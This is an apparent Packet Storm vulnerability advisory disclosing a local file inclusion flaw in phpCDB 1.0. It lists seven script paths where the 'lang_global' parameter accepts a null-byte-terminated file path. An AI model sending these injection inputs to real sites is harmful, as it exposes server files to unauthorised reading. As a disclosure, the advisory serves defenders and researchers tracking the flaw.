phpCDB version 1.0 suffers from a local file inclusion vulnerability.
ddec54e998bb62a48f11a098b4161752##############################################################
##phpCDB <= 1.0 Local File Include Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/phpcdb/files/
##############################################################
PoC:
[phpcdb_path]/firstvisit.php?lang_global=[LFI%00]
[phpcdb_path]/newfolder.php?lang_global=[LFI%00]
[phpcdb_path]/showfolders.php?lang_global=[LFI%00]
[phpcdb_path]/newlang.php?lang_global=[LFI%00]
[phpcdb_path]/showinnerfolder.php?lang_global=[LFI%00]
[phpcdb_path]/writecode.php?lang_global=[LFI%00]
[phpcdb_path]/showcode.php?lang_global=[LFI%00]
##############################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!